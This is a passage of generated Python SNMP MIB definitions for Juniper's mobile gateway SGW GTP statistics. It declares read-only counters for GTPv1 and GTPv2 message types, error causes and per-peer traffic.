if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRMValRcvTx.setDescription('Number of GTP packets sent with cause Reserved Message Value Received.')
jnxMbgSgwGtpV2ICsRPrNtRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 187), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRPrNtRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRPrNtRspRx.setDescription('Number of GTP packets received with cause Remote peer not responding.')
jnxMbgSgwGtpV2ICsRPrNtRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 188), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRPrNtRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRPrNtRspTx.setDescription('Number of GTP packets sent with cause Remote peer not responding.')
jnxMbgSgwGtpV2ICsColNWReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 189), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsColNWReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsColNWReqRx.setDescription('Number of GTP packets received with cause Collision with network initiated request.')
jnxMbgSgwGtpV2ICsColNWReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 190), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsColNWReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsColNWReqTx.setDescription('Number of GTP packets sent with cause Collision with network initiated request.')
jnxMbgSgwGtpV2ICsUnPgUESusRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 191), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnPgUESusRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnPgUESusRx.setDescription('Number of GTP packets received with cause Unable to page UE due to suspension.')
jnxMbgSgwGtpV2ICsUnPgUESusTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 192), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnPgUESusTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnPgUESusTx.setDescription('Number of GTP packets sent with cause Unable to page UE due to suspension.')
jnxMbgSgwGtpV2ICsInvTotLenRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 193), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvTotLenRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvTotLenRx.setDescription('Number of GTP packets received with cause Invalid total len.')
jnxMbgSgwGtpV2ICsInvTotLenTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 194), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvTotLenTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvTotLenTx.setDescription('Number of GTP packets sent with cause Invalid total len.')
jnxMbgSgwGtpV2ICsDtForNtSupRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 195), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsDtForNtSupRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsDtForNtSupRx.setDescription('Number of GTP packets received with cause Data forwarding not supported.')
jnxMbgSgwGtpV2ICsDtForNtSupTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 196), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsDtForNtSupTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsDtForNtSupTx.setDescription('Number of GTP packets sent with cause Data forwarding not supported.')
jnxMbgSgwGtpV2ICsInReFRePrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 197), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInReFRePrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInReFRePrRx.setDescription('Number of GTP packets received with cause Invalid Reply from Remote peer.')
jnxMbgSgwGtpV2ICsInReFRePrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 198), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInReFRePrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInReFRePrTx.setDescription('Number of GTP packets sent with cause Invalid Reply from Remote peer.')
jnxMbgSgwGtpV2ICsInvPrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 199), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvPrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvPrRx.setDescription('Number of GTP packets received with cause Invalid peer.')
jnxMbgSgwGtpV2ICsInvPrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 200), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvPrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvPrTx.setDescription('Number of GTP packets sent with cause Invalid peer.')
jnxMbgSgwGtpV1ProtocolErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 201), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV1ProtocolErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV1ProtocolErrRx.setDescription('Number of GTPv1 Protocol Errors Received.')
jnxMbgSgwGtpV1UnSupMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 202), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV1UnSupMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV1UnSupMsgRx.setDescription('Number of GTPv1 Unsupported Messages received.')
jnxMbgSgwGtpV1T3RespTmrExpRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 203), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV1T3RespTmrExpRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV1T3RespTmrExpRx.setDescription('Number of GTP V1 T3 timer expiries Received.')
jnxMbgSgwGtpV1EndMarkerRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 204), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV1EndMarkerRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV1EndMarkerRx.setDescription('Number of GTP V1 end marker packets received.')
jnxMbgSgwGtpV1EndMarkerTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 205), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV1EndMarkerTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV1EndMarkerTx.setDescription('Number of GTP V1 end marker packets sent.')
jnxMbgSgwGtpV1EchoReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 206), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV1EchoReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV1EchoReqRx.setDescription('Number of GTP V1 echo request packets received.')
jnxMbgSgwGtpV1EchoReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 207), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV1EchoReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV1EchoReqTx.setDescription('Number of GTP V1 echo request packets sent.')
jnxMbgSgwGtpV1EchoRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 208), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV1EchoRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV1EchoRespRx.setDescription('Number of GTP V1 echo response packets received.')
jnxMbgSgwGtpV1EchoRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 209), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV1EchoRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV1EchoRespTx.setDescription('Number of GTP V1 echo response packets sent.')
jnxMbgSgwGtpV1ErrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 210), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV1ErrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV1ErrIndRx.setDescription('Number of GTP V1 Error Indication packets received.')
jnxMbgSgwGtpV1ErrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 211), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV1ErrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV1ErrIndTx.setDescription('Number of GTP V1 Error Indication packets sent.')
jnxMbgSgwSuspNotifRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 212), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwSuspNotifRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwSuspNotifRx.setDescription('Number of GTPv2 Suspend Notification messages received.')
jnxMbgSgwSuspNotifTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 213), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwSuspNotifTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwSuspNotifTx.setDescription('Number of GTPv2 Suspend Notification messages sent.')
jnxMbgSgwSuspAckRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 214), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwSuspAckRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwSuspAckRx.setDescription('Number of GTPv2 Suspend Acknowledgement messages received.')
jnxMbgSgwSuspAckTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 215), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwSuspAckTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwSuspAckTx.setDescription('Number of GTPv2 Suspend Acknowledgement messages sent.')
jnxMbgSgwResumeNotifRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 216), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwResumeNotifRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwResumeNotifRx.setDescription('Number of GTPv2 Resume Notification messages received.')
jnxMbgSgwResumeNotifTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 217), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwResumeNotifTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwResumeNotifTx.setDescription('Number of GTPv2 Resume Notification messages sent.')
jnxMbgSgwResumeAckRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 218), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwResumeAckRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwResumeAckRx.setDescription('Number of GTPv2 Resume Acknowledgement messages received.')
jnxMbgSgwResumeAckTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 219), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwResumeAckTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwResumeAckTx.setDescription('Number of GTPv2 Resume Acknowledgement messages sent.')
jnxMbgSgwS11PiggybackMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 220), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwS11PiggybackMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwS11PiggybackMsgRx.setDescription('Number of GTPv2 S11 Piggyback messages received.')
jnxMbgSgwS11PiggybackMsgTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 221), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwS11PiggybackMsgTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwS11PiggybackMsgTx.setDescription('Number of GTPv2 S11 Piggyback messages sent.')
jnxMbgSgwS4PiggybackMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 222), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwS4PiggybackMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwS4PiggybackMsgRx.setDescription('Number of GTPv2 S4 Piggyback messages received.')
jnxMbgSgwS4PiggybackMsgTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 223), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwS4PiggybackMsgTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwS4PiggybackMsgTx.setDescription('Number of GTPv2 S4 Piggyback messages sent.')
jnxMbgSgwS5PiggybackMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 224), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwS5PiggybackMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwS5PiggybackMsgRx.setDescription('Number of GTPv2 S5 Piggyback messages received.')
jnxMbgSgwS5PiggybackMsgTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 225), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwS5PiggybackMsgTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwS5PiggybackMsgTx.setDescription('Number of GTPv2 S5 Piggyback messages sent.')
jnxMbgSgwGtpCPerPeerStatsTable = MibTable((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1), )
if mibBuilder.loadTexts: jnxMbgSgwGtpCPerPeerStatsTable.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpCPerPeerStatsTable.setDescription('Each entry corresponds to a GTP per peer level control statistic.')
jnxMbgSgwGtpPerPeerStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1), ).setIndexNames((0, "JUNIPER-MOBILE-GATEWAYS", "jnxMbgGwIndex"), (0, "JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwPPGtpRmtAddr"), (0, "JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwPPGtpLclAddr"), (0, "JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", "jnxMbgSgwPPGtpRtgInst"))
if mibBuilder.loadTexts: jnxMbgSgwGtpPerPeerStatsEntry.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpPerPeerStatsEntry.setDescription('A specification of the GTPC peer level Statistics.')
jnxMbgSgwPPGtpRmtAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 1), IpAddress())
if mibBuilder.loadTexts: jnxMbgSgwPPGtpRmtAddr.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpRmtAddr.setDescription('The Remote IP address of this GTP peer entry.')
jnxMbgSgwPPGtpLclAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 2), IpAddress())
if mibBuilder.loadTexts: jnxMbgSgwPPGtpLclAddr.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpLclAddr.setDescription('The Local IP address of this GTP peer entry.')
jnxMbgSgwPPGtpRtgInst = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 3), Unsigned32())
if mibBuilder.loadTexts: jnxMbgSgwPPGtpRtgInst.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpRtgInst.setDescription('The Routing Instance for this Peer.')
jnxMbgSgwPPRxPacketsDropped = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 4), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPRxPacketsDropped.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPRxPacketsDropped.setDescription('Number of Received Packets Dropped.')
jnxMbgSgwPPPacketAllocFail = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 5), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPPacketAllocFail.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPPacketAllocFail.setDescription('Number of Packet allocation failures.')
jnxMbgSgwPPPacketSendFail = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 6), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPPacketSendFail.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPPacketSendFail.setDescription('Number of Packet Send failures.')
jnxMbgSgwPPIPVerErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 7), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPIPVerErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPIPVerErrRx.setDescription('Number of IP Version Error Packets Received.')
jnxMbgSgwPPIPProtoErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 8), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPIPProtoErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPIPProtoErrRx.setDescription('Number of IP Protocol Error packets Received.')
jnxMbgSgwPPGTPPortErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 9), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGTPPortErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGTPPortErrRx.setDescription('Number of Port Error Packets Received.')
jnxMbgSgwPPGTPUnknVerRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 10), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGTPUnknVerRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGTPUnknVerRx.setDescription('Number of Unknown Version Packets Received.')
jnxMbgSgwPPPcktLenErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 11), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPPcktLenErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPPcktLenErrRx.setDescription('Number of Packet Length Error Packets Received.')
jnxMbgSgwPPUnknMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 12), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPUnknMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPUnknMsgRx.setDescription('Number of Unknown Messages Received.')
jnxMbgSgwPPProtocolErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 13), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPProtocolErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPProtocolErrRx.setDescription('Number of GTPv2 Protocol Errors Received.')
jnxMbgSgwPPUnSupportedMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 14), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPUnSupportedMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPUnSupportedMsgRx.setDescription('Number of GTPv2 Unsupported Messages received.')
jnxMbgSgwPPT3RespTmrExpRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 15), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPT3RespTmrExpRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPT3RespTmrExpRx.setDescription('Number of GTP V2 T3 timer expiries Received.')
jnxMbgSgwPPV2NumMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 16), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPV2NumMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPV2NumMsgRx.setDescription('Number of GTPv2 messages received.')
jnxMbgSgwPPV2NumMsgTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 17), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPV2NumMsgTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPV2NumMsgTx.setDescription('Number of GTPV2 messages sent.')
jnxMbgSgwPPV2NumBytesRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 18), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPV2NumBytesRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPV2NumBytesRx.setDescription('Number of GTPv2 bytes received.')
jnxMbgSgwPPV2NumBytesTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 19), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPV2NumBytesTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPV2NumBytesTx.setDescription('Number of GTPV2 bytes sent.')
jnxMbgSgwPPV2EchoReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 20), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPV2EchoReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPV2EchoReqRx.setDescription('Number of GTP V2 Echo Request received.')
jnxMbgSgwPPV2EchoReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 21), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPV2EchoReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPV2EchoReqTx.setDescription('Number of GTP V2 Echo Request Sent.')
jnxMbgSgwPPV2EchoRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 22), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPV2EchoRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPV2EchoRespRx.setDescription('Number of GTP V2 Echo Response received.')
jnxMbgSgwPPV2EchoRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 23), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPV2EchoRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPV2EchoRespTx.setDescription('Number of GTP V2 Echo Response Sent.')
jnxMbgSgwPPV2VerNotSupRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 24), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPV2VerNotSupRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPV2VerNotSupRx.setDescription('Number of GTP V2 Version Not supported messages received')
jnxMbgSgwPPV2VerNotSupTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 25), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPV2VerNotSupTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPV2VerNotSupTx.setDescription('Number of GTP V2 Number of version not supported messages sent.')
jnxMbgSgwPPCreateSessReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 26), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPCreateSessReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPCreateSessReqRx.setDescription('Number of GTP V2 Create Session Requests received.')
jnxMbgSgwPPCreateSessReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 27), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPCreateSessReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPCreateSessReqTx.setDescription('Number of GTP V2 Create Session Requests Sent.')
jnxMbgSgwPPCreateSessRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 28), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPCreateSessRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPCreateSessRspRx.setDescription('Number of GTP V2 Create Session Responses received.')
jnxMbgSgwPPCreateSessRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 29), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPCreateSessRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPCreateSessRspTx.setDescription('Number of GTP V2 Create Session Responses Sent.')
jnxMbgSgwPPModBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 30), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPModBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPModBrReqRx.setDescription('Number of GTP V2 Modify Bearer Requests received.')
jnxMbgSgwPPModBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 31), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPModBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPModBrReqTx.setDescription('Number of GTP V2 Modify Bearer Requests Sent.')
jnxMbgSgwPPModBrRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 32), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPModBrRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPModBrRspRx.setDescription('Number of GTP V2 Modify Bearer Responses received.')
jnxMbgSgwPPModBrRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 33), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPModBrRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPModBrRspTx.setDescription('Number of GTP V2 Modify Bearer Responses Sent.')
